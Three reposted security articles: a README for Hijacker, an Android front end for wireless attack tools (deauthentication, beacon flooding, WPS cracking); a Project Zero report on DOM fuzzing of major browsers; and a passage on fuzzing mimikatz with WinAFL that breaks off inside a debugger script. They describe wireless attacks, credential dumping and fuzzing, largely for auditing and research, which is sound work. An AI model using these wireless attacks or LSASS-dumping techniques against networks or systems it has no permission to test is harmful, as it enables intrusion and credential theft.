Hijacker

Hijacker is a graphical user interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI for using these tools without typing commands in a console and copy-pasting MAC addresses.

This application requires an ARM Android device with a wireless adapter that supports Monitor Mode. A few Android devices do, but none of them natively. This means that you will need a custom firmware. The Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as the Xperia Z2, LG G2 etc.) will work with Nexmon (which also supports some other chipsets). Devices that use the BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work.

Features

Information Gathering
- View a list of access points and stations (clients) around you (even hidden ones)
- View the activity of a specific network (by measuring beacons and data packets) and its clients
- Statistics about access points and stations
- See the manufacturer of a device (AP or station) from the OUI database
- See the signal power of devices and filter the ones that are closer to you
- Save captured packets in a .cap file

Attacks
- Deauthenticate all the clients of a network (either targeting each one (effective) or without a specific target)
- Deauthenticate a specific client from the network it's connected to
- MDK3 Beacon Flooding with custom options and an SSID list
- MDK3 Authentication DoS for a specific network or for everyone
- Capture a WPA handshake or gather IVs to crack a WEP network
- Reaver WPS cracking (pixie-dust attack using NetHunter chroot and an external adapter)

Other
- Leave the app running in the background, optionally with a notification
- Copy commands or MAC addresses to the clipboard
- Includes the required tools, no need for manual installation
- Includes the Nexmon driver and management utility for BCM4339 devices
- Set commands to enable and disable monitor mode automatically
- Crack .cap files with a custom wordlist
- Create custom actions and run them on an access point or a client easily
- Sort and filter access points by many parameters
- Export all the gathered information to a file
- Add an alias to a device (by MAC) for easier identification

Installation

Make sure:
- you are on Android 5+
- you are rooted (SuperSU is required; if you are on CM/LineageOS install SuperSU)
- you have a firmware that supports Monitor Mode on your wireless interface

Download the latest version here.

When you run Hijacker for the first time, you will be asked whether you want to install the Nexmon firmware or go to the home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled WiFi and that it's in monitor mode.

Troubleshooting

This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else.
You can check by going to settings: if you have the option to install Nexmon, then you are on the correct architecture; otherwise you will have to install all the tools manually (busybox, the aircrack-ng suite, mdk3, reaver, wireless tools, the libfakeioctl.so library) and set the 'Prefix' option so the tools preload the library they need.

In settings there is an option to test the tools. If something fails, you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal to see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings.

If the app happens to crash, a new activity will start which generates a report in your external storage and gives you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself; it's just a txt file in your external storage directory. The part with the most important information is shown in the activity. Please do not report bugs for devices that are not supported or when you are using an outdated version.

Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault; it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development, so bugs are to be expected.

Warning

Legal: It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to test. Using software that puts a network adapter into promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second that it's untraceable. I am not responsible for how you use this application and any damage you may cause.

Device: The app gives you the option to install the Nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for the BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with a factory reset). I am not responsible for any damage caused to your device by this software. Consider yourself warned.

Donate: If you like my work, you can buy me a beer.

Sursa: https://github.com/chrisk44/Hijacker
Thursday, September 21, 2017

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero

Introduction

Historically, DOM engines have been one of the largest sources of web browser bugs. And while in recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox's DOM implementation, specifically the part that handles SVG elements in a web page. It is also rare for a vendor to publish a security update that doesn't contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers, as well as browser vendors who care about security, invest in building DOM fuzzers and associated infrastructure. As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I'm open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead, the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extensible, and can be reused by myself as well as other researchers for fuzzing targets other than just the DOM. We named this new fuzzer Domato (credits to Tavis for suggesting the name).

Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes the HTML/CSS structure as well as various JavaScript objects, properties and functions. The fuzzer consists of several parts:
- The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
- The main script that parses the arguments and uses the base engine to create samples. Most DOM-specific logic is captured in this part.
- A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects of generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach: I initially extracted DOM API declarations from .idl files in the Google Chrome source. Similarly, I parsed Chrome's layout tests to extract common (and not so common) names and values of various HTML and CSS properties. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior.
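To make the idea of grammar-driven generation concrete, here is a toy sketch in Python. This is not Domato's actual engine or grammar format (see the repository linked below for the real thing); it only illustrates the recursive expansion of symbols into a sample:

```python
import random

# Toy grammar-based generator: each symbol maps to a list of possible
# expansions, and <symbol> tokens inside an expansion are replaced
# recursively. Real grammars (like Domato's) are far larger and also
# track state, e.g. which JavaScript variables already exist.
GRAMMAR = {
    "html": ["<element>", "<element><element>"],
    "element": ['<div style="<cssrule>"><element></div>', "<b>text</b>"],
    "cssrule": ["color: <color>", "width: <int>px"],
    "color": ["red", "blue", "#<int>"],
    "int": [str(random.randint(0, 2**16)) for _ in range(16)],
}

def generate(symbol="html", depth=0):
    # Pick a random production and recursively expand nested symbols,
    # bounding the recursion depth so generation always terminates.
    if depth > 8:
        return ""
    out = random.choice(GRAMMAR[symbol])
    for sub in GRAMMAR:
        while "<%s>" % sub in out:
            out = out.replace("<%s>" % sub, generate(sub, depth + 1), 1)
    return out

print(generate())
```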
One example of that manual editing concerns functions and properties that take strings as input: just because a DOM property takes a string as input does not mean that any arbitrary string is meaningful in the context of that property. Otherwise, Domato supports features that you'd expect from a DOM fuzzer, such as:
- Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
- Implicit (through grammar definitions) support for "interesting" APIs (e.g. the Range API) that have historically been prone to bugs

Instead of going into much technical detail here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I will invite community contributions that cover the areas I might have missed in the fuzzer or grammar creation.

Setup

We tested the 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100,000,000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100,000,000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptible VMs (which I think work well for fuzzing jobs as they don't need to be up all the time) and 10 seconds per run. (Back-of-the-envelope: 100,000,000 runs at 10 seconds each is roughly 278,000 CPU-hours, which at preemptible prices of a fraction of a cent per instance-hour indeed comes to about $1,000.)

Here are additional details of the fuzzing setup for each browser:
- Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer, and it was run automatically against various Chrome builds.
- Mozilla Firefox was fuzzed on internal Google infrastructure (Linux-based). Since Mozilla already offers Firefox ASAN builds for download, we used those as the fuzzing target. Each crash was additionally verified against a release build.
- Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of an ASAN build, page heap was applied to the iexplore.exe process to make it easier to catch some types of issues.
- Microsoft Edge was the only browser we couldn't easily fuzz on Google infrastructure, since Google Compute Engine doesn't support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That's why, to fuzz it, we created a virtual cluster of Windows 10 VMs on Microsoft Azure. As with Internet Explorer, page heap was applied to the MicrosoftEdgeCP.exe process before fuzzing.
- Instead of fuzzing Safari directly, which would require Apple hardware, we used WebKitGTK+, which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.

Results

Without further ado, the number of security bugs found in each browser is captured in the table below.
Only security bugs were counted in the results (doing anything else is tricky, as some browser vendors fix non-security crashes while some don't), and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don't know whether bugs in the development version would be caught by internal review and fuzzing processes before release).

| Vendor | Browser | Engine | Number of Bugs | Project Zero Bug IDs |
|---|---|---|---|---|
| Google | Chrome | Blink | 2 | 994, 1024 |
| Mozilla | Firefox | Gecko | 4** | 1130, 1155, 1160, 1185 |
| Microsoft | Internet Explorer | Trident | 4 | 1011, 1076, 1118, 1233 |
| Microsoft | Edge | EdgeHtml | 6 | 1011, 1254, 1255, 1264, 1301, 1309 |
| Apple | Safari | WebKit | 17 | 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250 |
| | | Total | 31* | |

*While adding up the number of bugs results in 33, 2 of the bugs affected multiple browsers.
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count it here.

As can be seen in the table, most browsers did relatively well in the experiment, with only a couple of security-relevant crashes found. Since the same methodology used to result in a significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser's DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment, with a significantly higher number of bugs found. This is especially worrying given attackers' interest in the platform, as evidenced by exploit prices and recent targeted attacks. It is also interesting to compare Safari's results to Chrome's, as until a couple of years ago they were using the same DOM engine (WebKit). It appears that after the Blink/WebKit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft's team behind it!

When interpreting the results, it is very important to note that they don't necessarily reflect the security of the whole browser; instead they focus on just a single component (the DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as the presence and security of a sandbox, bugs in other components such as scripting engines, etc.
I also cannot disregard the possibility that, within the DOM, my fuzzer is more capable of finding certain types of issues than others, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas, we wanted to combine it with DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and a modified WinAFL DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
2. The fuzzer spawns an IE process which opens a harness HTML page.
3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe.
4. After the sample executes, it notifies the harness, which notifies the fuzzer to stop collecting coverage.
5. The coverage map is examined and, if it contains unseen coverage, the corresponding sample is added to the corpus.
6. Go to step 3 until all samples are executed or the IE process crashes.
7. Periodically minimize the corpus using AFL's cmin algorithm.
8. Go to step 1.

The following set of mutations was used to produce new samples from the existing ones:
- Adding new CSS rules
- Adding new properties to the existing CSS rules
- Adding new HTML elements
- Adding new properties to the existing HTML elements
- Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear that more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.

Conclusion

As stated before, DOM engines have been one of the largest sources of web browser bugs. While these bugs are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing, as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product's security posture.

The big question at the end is: are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Sursa: https://googleprojectzero.blogspot.ro/2017/09/the-great-dom-fuzz-off-of-2017.html
HACK THE HACKER - FUZZING MIMIKATZ ON WINDOWS WITH WINAFL & HEATMAPS (0DAY)

In this blog post, I want to explain two topics from a theoretical and practical point of view:
- How to fuzz Windows binaries with source code available (this part is for developers) and
- How to deal with big input files (aka heatmap fuzzing) and crash analysis (for security consultants; more technical)

Since this blog post got too long and I didn't want to remove important theory, I marked background knowledge with grey color. Feel free to skip these sections if you are already familiar with this knowledge. If you are only interested in the exploitable mimikatz flaws, you can jump to the chapter "Practice: Analysis of the identified crashes".

I (René Freingruber from SEC Consult Vulnerability Lab) am going to give a talk at heise devSec (and IT-SECX and DefCamp) about fuzzing binaries for developers, and therefore I wanted to test different approaches to fuzzing Windows applications where source code is available (the audience is most likely developers). To my knowledge there are several blog posts about fuzzing Linux applications with AFL or libFuzzer (just compile the application with afl-gcc instead of gcc, or add some flags to clang), but there is no blog post explaining the concept and setup for Windows. This blog post tries to fill this gap. Fuzzing is a very important concept during development, so all developers should know how to do it correctly and that such a setup can be simple and fast!

WHY I CHOSE MIMIKATZ AS FUZZING TARGET

To demonstrate fuzzing I had to find a good target where source code is available. At the same time, I wanted to learn more about the internals of the application by reading the source code. Therefore, my decision fell on mimikatz: it's an extremely useful tool for security consultants (and hackers), and I always wanted to understand how mimikatz works internally. Mimikatz is a powerful hacker tool for Windows which can be used to extract plaintext credentials, hashes of currently logged-on users, machine certificates and many other things. Moreover, mimikatz contains over 261,000 lines of code, must parse many different data structures and is therefore likely to be affected by vulnerabilities itself. At this point I also want to say that penetration testing would not be the same without the amazing work of Benjamin Delpy (gentilkiwi), the author of mimikatz.

The next thing I needed was a good attack vector. Why should I search for vulnerabilities if there is no real attack vector which can trigger them? Mimikatz can be used to dump cleartext credentials and hashes of currently logged-in users from the LSASS process. But if there is a bug in the parsing code of mimikatz, what exactly could I achieve with it? I would just exploit myself, because mimikatz gets executed on the same system. Well, not always. As it turns out, well-educated security consultants and hackers do not directly invoke mimikatz on the owned system. Instead, it's nowadays widespread practice to create a minidump of the LSASS process on the owned system, download it and invoke mimikatz locally (on the attacker's system). Why do we do this? Because dropping mimikatz on the owned system could trigger all kinds of alerts (antivirus, application whitelisting, Windows logs, ...), and because we want to stay under the radar, we don't want these alerts. Instead, we can use Microsoft-signed binaries to dump the LSASS process (e.g. Task Manager, procdump.exe, msbuild.exe or sqldumper.exe).
Now we have a good attack vector! We can create a honeypot, inject some malicious stuff into our own LSASS process, wait until a hacker owns it, dumps the LSASS process and invokes mimikatz on his own system to read our manipulated memory dump file - and watch the reverse shells come in! This and similar attack vectors can be interesting features in the future for deception technologies such as CyberTrap (https://www.cybertrap.com/).

To be fair, exploiting this scenario can be quite difficult, because mimikatz is compiled with protections such as ASLR and DEP, and exploitation of such a client-side application is extremely challenging (we don't have the luxury of a remote memory leak, nor of scripting possibilities as with browsers or PDF readers). However, such client-side scriptless exploits are not impossible; for example, see https://scarybeastsecurity.blogspot.co.at/2016/11/0day-exploit-advancing-exploitation.html. To my surprise, mimikatz contained a very powerful vulnerability which allows us to bypass ASLR (and DEP).

THEORY: FUZZING WINDOWS BINARIES

We don't want to write a mimikatz-specific fuzzer (with knowledge about the parsing structures, implemented checks and so on); instead, we want to use something called "coverage-guided fuzzing" (or feedback-based fuzzing). This means we want to extract code-coverage information during fuzzing. If one of our mutated input files (the memory dump files) generates more code coverage in mimikatz, we want to add it to our fuzzing queue and fuzz this input later as well. That means we start with one dump file and the fuzzer identifies different code paths by itself (ideally all of them), therefore "learning" all the internal parsing logic autonomously! It also means that we only have to write a fuzzer once and can use it against nearly all kinds of applications! Luckily for us, we don't even have to write such a fuzzer, because someone else already did an excellent job.

Currently the most commonly used fuzzer is AFL (American fuzzy lop), which implements exactly this idea. It turned out that AFL is extremely effective at identifying vulnerabilities. In my opinion, this is because of four major characteristics of AFL:
1. It is extremely fast.
2. It extracts edge coverage (with hit counts) and not only code coverage, which, simplified, means that we try to maximize executed "paths" and not "code". (E.g. with an IF statement, code coverage would put into the queue an input file which executes the code inside the IF. Edge coverage, on the other hand, would put into the queue one entry with, and one entry without, the IF-body code.)
3. Because of 1) it can implement deterministic mutations (do every operation on every byte/bit of the input). More on this later when talking about heatmap fuzzing.
4. It's extremely simple to use. Fuzzing can be started within several minutes!

The big question now is: how does AFL extract the code/edge coverage information? The answer depends on the configured mode of AFL. The default option is to "hack" the object files generated by gcc and insert instrumentation code at all possible code locations. There is also an LLVM mode, where an LLVM compiler pass is used to insert the instrumentation. And then there is a qemu mode, for when source code is not available, which emulates the binary and adds instrumentation via qemu. There are several forks which extend AFL with other instrumentation possibilities. For example, hardware features can also be used to extract code coverage (WinAFL-IntelPT, kAFL).
Another idea is to use dynamic instrumentation frameworks such as PIN or DynamoRio (e.g. WinAFL). These frameworks can instrument the target binary dynamically (at runtime), which means that a dispatcher loads the next instructions to be executed and adds additional instrumentation code before (and after) them. All that requires dynamic relocation of the instructions while staying completely transparent to the target application. This is quite complicated, but the framework hides all that logic from the user. Obviously, this approach is not fast (but it works on Windows and has many cool features for the future!).

When source code is available, I thought that there should be the same possibility as AFL has on Linux (with GCC). My first attempt was to use "libFuzzer" on Windows. LibFuzzer is a fuzzer like AFL, but it works at function level and is therefore more suitable for developers. AFL fuzzes full binaries per default but can also be started in a persistent mode where it fuzzes at function level. LibFuzzer uses the "source-based code coverage" feature of the LLVM clang compiler, which is exactly what I wanted to use for coverage information on Windows. After some initial errors I could compile mimikatz with LLVM on Windows. When adding the flags for source-based code coverage I got more errors, which can be fixed by adding the required libraries to the linker include paths. However, this flag added the same functions to all object files, which resulted in linker errors. The only way I could solve this was to merge all .c files into one huge file. Since this approach was more of a pain than anything else, I didn't pursue it further for the talk. Note that using LLVM for application analysis on Windows could be a very interesting approach in the future!

The next thing I tested was WinAFL in syzygy mode, and this was exactly what I was looking for! For a more detailed description of syzygy see https://doar-e.github.io/blog/2017/08/05/binary-rewriting-with-syzygy/. At this point I want to thank Ivan Fratric (developer of WinAFL) and Axel "0vercl0k" Souchet (developer of the syzygy mode) for their amazing job, and of course Michal Zalewski for AFL!

PRACTICE: FUZZING WINDOWS BINARIES

You can download WinAFL from here: https://github.com/ivanfratric/winafl

All we must do is include the header, add the code

```c
while (__afl_persistent_loop()) {
    // code to fuzz
}
```

to the project which we want to fuzz, and compile a 32-bit application with the /PROFILE linker flag (Visual Studio -> project properties -> Linker -> Advanced -> Profile). For mimikatz I removed the command prompt code from the wmain function (inside mimikatz.c) and just called kuhl_m_sekurlsa_all(argc, argv), because I wanted to directly dump the hashes/passwords from the minidump (i.e. issue the sekurlsa::logonpasswords command at program invocation). Since mimikatz would per default extract this information from the LSASS process, I added a line inside kuhl_m_sekurlsa_all() to load the dump instead. Moreover, I added the persistent loop inside this function. Here is how my new kuhl_m_sekurlsa_all() function looks:

```c
NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[])
{
    while (__afl_persistent_loop())
    {
        kuhl_m_sekurlsa_reset();                                                // sekurlsa::minidump command
        pMinidumpName = argv[1];                                                // sekurlsa::minidump command
        kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages));  // sekurlsa::logonpasswords command
    }
    return STATUS_SUCCESS;
}
```

Hint: Do not use the above code during fuzzing.
I added a subtle flaw which I'm going to explain later. Can you already spot it?

After compilation, we can start the binary and see some additional messages. The next step is to instrument the code. For this to work we must register "msdia140.dll". This can be done via the command:

regsvr32 C:\path\to\msdia140.dll

Then we can call the downloaded instrument.exe binary with the generated mimikatz.exe and mimikatz.pdb files to add the instrumentation. We can start the instrumented binary and see the adapted status message. Now we can generate a minidump file for mimikatz (on a Windows 7 x86 test system I used Task Manager to dump the LSASS process), put it into the input directory and start fuzzing. As we can see, we have a file size problem!

THEORY: FUZZING AND THE INPUT FILE SIZE PROBLEM

We can see that AFL restricts input files to a maximum size of 1 MB. Why? Recall that AFL does deterministic fuzzing before switching to random fuzzing for each queue input. That means that it performs specific bit and byte flips/additions/removals/... for every (!) byte/bit of the input! This includes several strategies like bitflip 1/1, bitflip 2/1, ..., arith 8/8, arith 16/8 and so on. For example, bitflip 1/1 means that AFL flips 1 bit per execution and then moves forward 1 bit to flip the next bit, whereas 2/1 means that 2 bits are flipped and the step length is 1 bit. Arith 16/8 means that the step is 8 bits and that AFL tries to add interesting values to the value treated as a 16-bit integer. And there are several more such deterministic fuzzing strategies. All these strategies have in common that the number of required application executions depends on the file size!

Let's assume that AFL only (!) does the bitflip 1/1 deterministic strategy. This means that we must execute the target application exactly input-filesize (in bits) number of times. WinAFL does in-memory fuzzing, which means that we don't have to start the application every time, but let's ignore this for now so that our discussion does not get too complicated. Let's say that our input binary has a size of 10 kB. That is 81,920 required executions for the deterministic stage (only for bitflip 1/1)! AFL conducts many more deterministic strategies. For AFL on Linux this is not very much; it's not uncommon to get execution speeds of 1,000-8,000 executions per second per core (because of the fork server, persistent mode, ...). This fast execution speed together with deterministic fuzzing (and edge coverage) made AFL so successful. So, if we have 16 cores, we can easily do this strategy for one input file within a second.

Now let's assume that our input has a size of 1 MB (the AFL limit), which means 8,388,608 required executions for bitflip 1/1, that our target application is a little bit slower because it's bigger and running on Windows (200 exec/sec), and that we have just one core available for fuzzing. Then we need 11.5 hours just to finish bitflip 1/1 for one input entry! Recall that we must conduct this deterministic stage for every new queue entry (every time we identify new coverage, we must do this again; it's not uncommon for the queue to grow to several thousand inputs). And if we consider all the other deterministic operations which must be performed, the situation becomes even worse. And in our case the input (memory dump) has a size of 27 MB! That would be 216,036,224 required executions just for bitflip 1/1.
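These numbers are easy to verify with a quick back-of-the-envelope script (the exact byte size of the 27 MB dump, 27,004,528 bytes, is implied by the 216,036,224 executions above; 200 exec/sec is the assumed speed of the Windows target):

```python
# Cost of AFL's bitflip 1/1 stage alone: one execution per input bit.
EXECS_PER_SEC = 200  # assumed execution speed of the Windows target

for name, size_in_bytes in [("10 kB", 10 * 1024),
                            ("1 MB", 1024 * 1024),
                            ("27 MB dump", 27004528)]:
    execs = size_in_bytes * 8                  # one bit flip per execution
    hours = execs / float(EXECS_PER_SEC) / 3600
    print("%-12s %11d execs %8.1f hours" % (name, execs, hours))

# 10 kB              81920 execs      0.1 hours
# 1 MB             8388608 execs     11.7 hours
# 27 MB dump     216036224 execs    300.1 hours   (bitflip 1/1 only!)
```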
AFL detects this and directly aborts, because this would just take too long (and AFL would never find vulnerabilities because it would be stuck in deterministic fuzzing). Of course, we can tell AFL to skip deterministic fuzzing, but that would not be very good, because we still have to find the particular byte/bit flip which triggers the vulnerability. And the likelihood of this in such a big input file is not very high... Here is a quote from Michal Zalewski (author of AFL) from the perf_tips.txt document:

"To illustrate, let's say that you're randomly flipping bits in a file, one bit at a time. Let's assume that if you flip bit #47, you will hit a security bug; flipping any other bit just results in an invalid document. Now, if your starting test case is 100 bytes long, you will have a 71% chance of triggering the bug within the first 1,000 execs - not bad! But if the test case is 1 kB long, the probability that we will randomly hit the right pattern in the same timeframe goes down to 11%. And if it has 10 kB of non-essential cruft, the odds plunge to 1%."

The key lesson is that input file size is very important during fuzzing! At least as important as the plain execution speed of the fuzzer! There are tools and scripts shipped with AFL (cmin/tmin) to minimize the number of input files and the file size. However, I don't want to talk about them in this blog post. They shrink files via a fuzzing approach, and since the problem is NP-hard, they use heuristics. Tmin is also very slow (execution time depends on the file size...) and often leads to problems with files containing offsets (like our dump file) and checksums. Another idea could be to start WinAFL with an empty input file. However, memory dumps are quite complex, and I don't want to "waste" time while WinAFL identifies the format. And here is where heatmaps come into play.

PRACTICE: FUZZING AND HEATMAPS

My first attempt to minimize the input file was to read the source code of mimikatz and understand how it finds the important memory regions (containing the plaintext passwords and hashes) in the memory dump. I assumed some kind of pattern search; however, mimikatz parses and uses lots of structures, and I quickly discarded the idea of manually creating a smaller input binary by understanding mimikatz. During fuzzing we also don't want to have to understand the application in order to write a specific fuzzer; instead, we want the fuzzer to learn everything itself. If we could somehow give the fuzzer the same ability to detect the "important input bytes"...

While reading the code I identified something interesting. Mimikatz loads the memory dump via kernel32!MapViewOfFile(). After that, it reads nearly all required information from there (sometimes it also copies it via kull_m_minidump_copy, but let's not get too complicated for the moment). If we can log all memory access attempts to this memory region, we can reduce the number of required executions drastically! If mimikatz does not touch a specific memory region, why should we even fuzz the bytes there?

Here is a heatmap which I generated based on memory read operations from mimikatz on my 27 MB input file (generated via a plotly Python script): the black area is never read by mimikatz. The brighter the area, the more memory read operations accessed this region. The start of the file is located at the bottom left of the picture. I print 1000 bytes per line (from left to right), then go one line up and print the next 1000 bytes, and so on.
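The plotting script itself is not part of the post; a minimal sketch of the idea, assuming a log file of "offset hitcount" pairs (as produced by the debugger script shown later) and the plotly package, could look like this:

```python
import math
import plotly.graph_objs as go
import plotly.offline as pyo

# One matrix row per 1000 bytes of the dump; log-scaled hitcounts so that
# rarely-read offsets (red/yellow) stay visible next to hot ones (white).
# For a 27 MB dump you will want to downsample or plot a smaller window.
WIDTH = 1000
SIZE = 27 * 1024 * 1024  # dump file size; adjust to the actual file

hits = {}  # file offset -> number of read operations
with open("offsets.log") as f:
    for line in f:
        off, cnt = line.split()
        hits[int(off, 0)] = int(cnt)

z = [[math.log1p(hits.get(base + i, 0)) for i in range(WIDTH)]
     for base in range(0, SIZE, WIDTH)]

pyo.plot(go.Figure(data=[go.Heatmap(z=z)]), filename="heatmap.html")
```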
At this zoom level we do not see access attempts at the start (header) of the memory dump. However, this is only because the file size is 27 MB, so the smaller red/yellow/white dots are not visible. But we can zoom in.

The most important message from the above pictures: we do not have to fuzz the bytes from the black area! But we can do even better: we can start fuzzing the white bytes (many read attempts, like offset 0xaa00, which gets read several thousand times), then continue with the yellow bytes (e.g. offset 0x08 is read several hundred times) and then the red areas (which are read only 1-5 times). This in itself is not a perfect approach (more read attempts also mean a higher likelihood that the input becomes invalid, so it's maybe not the best idea to start with the white areas; but since we must do the full deterministic step, it basically does not matter with which offsets we start. Hint: a better strategy is to also consider the address of the triggering read instruction together with the hit counts).

You are maybe wondering how I extracted the memory-read information. For mimikatz I just used a stupid PoC debugger script; however, I'm currently developing a more sophisticated script based on dynamic instrumentation frameworks which can extract such information from any application. The use of a debugger script is "stupid" because it's very slow and does not work for every application. However, for mimikatz it worked fine, because mimikatz reads most of the time from the region which is mapped via MapViewOfFile(). My WinAppDbg script is very simple: I just use the API-hooking mechanism of WinAppDbg to hook the post-routine of MapViewOfFile. The return value contains the memory address where the input memory dump is loaded. I place a memory breakpoint on it (via the watch_buffer() method), and at every breakpoint hit (memory_breakpoint_callback) I just log the relative offset and increment the hit counter. Inside the callback I use capstone to disassemble the triggering instruction and obtain the size of the read operation, so the offsets are updated correctly. We start mimikatz via the debugger, and as soon as mimikatz finishes (debug.loop() returns), we sort the offsets based on the hit counts and dump them to a log file. You can also extend this script to become more complex (e.g. hook kull_m_memory_search() or kull_m_minidump_copy()). Hint: WinAppDbg has a bug inside watch_buffer() which does not return the bw variable. If the script is to be extended (e.g. to disable the memory breakpoint for search functions), the WinAppDbg source must be modified to return the "bw" variable in the watch_buffer() function. As you can see, there is no magic involved and the script is really simple (at least this one, which only works with mimikatz). A reconstruction is sketched below.
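This is a minimal reconstruction from the description above, not the original script; it assumes WinAppDbg's API-hooking mechanism, a fixed mapping size and a hypothetical command line, and omits the capstone read-size handling for brevity:

```python
from collections import defaultdict
from winappdbg import Debug, EventHandler

DUMP_SIZE = 27 * 1024 * 1024   # size of the watched mapping (assumption)
hitcounts = defaultdict(int)   # relative file offset -> number of reads
mapping_base = []              # base address returned by MapViewOfFile

class MapViewOfFileHook(EventHandler):
    # kernel32!MapViewOfFile takes 5 parameters
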